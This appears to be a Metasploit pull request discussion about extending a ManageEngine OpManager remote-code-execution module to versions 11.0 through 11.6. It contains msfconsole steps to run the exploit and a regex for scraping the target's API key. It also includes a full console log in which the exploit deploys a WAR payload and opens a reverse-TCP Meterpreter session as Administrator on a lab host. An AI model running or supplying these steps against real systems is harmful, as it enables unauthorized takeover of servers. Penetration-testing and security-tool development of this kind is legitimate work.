OpManager Version Check

[cleorun]

Checks for the version of the OpManager. For version 11.6 the call for the api key value is different from the one in version 11.0, which stops the current exploit from working on older versions. The rest of the exploit works the same.

For versions 11.5 and up /window.OPM.apiKey
For version 11.0 /window.apiKey

Tested on version 11.0

Verification

• Start msfconsole
• use exploit/windows/http/manage_engine_opmanager_rce
• set RHOST <IP addr of target system running OpManager>
• exploit
• Verify you get a working Meterpreter session

[egypt]

It seems like you could skip the version check by having a more accepting regex in the key check, like so:

if res && res.code == 200 && res.body =~ /window.(?:OPM.)?apiKey = "([a-z0-9])"/

Am I missing something or does that work?

[cleorun]

That works and it's way easier, my ruby is not brilliant (just tested on version 11 of OpManager)

Then it might be healthy to change the target name to reflect other versions, as the exploit is valid for versions 11.0 - 11.6.

Thank you egypt!

[pbarry-r7]

Updated verification steps above in the description...

[pbarry-r7]

Thanks for this module update, @cleorun! I made a couple of tweaks to this PR, see under the "commits" section.

Verified on Windows Server 2012 with OpManager v11.4 (i.e. windows.apiKey) and v11.5 (i.e. windows.OPM.apiKey), both worked as expected with similar output:

$ ./msfconsole -q
msf > use exploit/windows/http/manage_engine_opmanager_rce 
msf exploit(manage_engine_opmanager_rce) > set RHOST 10.0.2.12
RHOST => 10.0.2.12
msf exploit(manage_engine_opmanager_rce) > exploit

[*] Started reverse TCP handler on 10.0.2.4:4444 
[*] Access login page
[*] Location is [ http://10.0.2.12/apiclient/ember/index.jsp;jsessionid=B5903DA9A1DBA5592690EC69AF7FA27D ]
[*] Following redirection
[*] Retrieved API key [ 2eb58a9f104f29c8520d23243502cf5b ]
[*] Executing SQL queries
[*] Attempting to launch payload in deployed WAR...
[*] Attempting to launch payload in deployed WAR...
[*] Attempting to launch payload in deployed WAR...
[*] Sending stage (49667 bytes) to 10.0.2.12
[*] Meterpreter session 1 opened (10.0.2.4:4444 -> 10.0.2.12:49496) at 2017-06-20 15:13:50 -0500
[+] Deleted tomcat//webapps//r63xuE3q1gOAZsCQuJ.war
[!] This exploit may require manual cleanup of 'tomcat//webapps//r63xuE3q1gOAZsCQuJ' on the target

meterpreter > getuid
Server username: Administrator
meterpreter > sysinfo
Computer    : WIN-SI597APFOFH
OS          : Windows Server 2008 6.2 (amd64)
Meterpreter : java/windows

It appears this module is missing a nice documentation markdown file, I'll add it and then land this PR.

[alrosenthal-r7]

Release Notes

A version check for OpManager has been added to the exploits/windows/http/manage_engine_opmanager_rce module. The exploit now uses the appropriate call for the API key value based on the version, which allows it to work on older versions that use a different call.

[pbarry-r7]

TY, @alrosenthal-r7!

[cleorun]

thank you!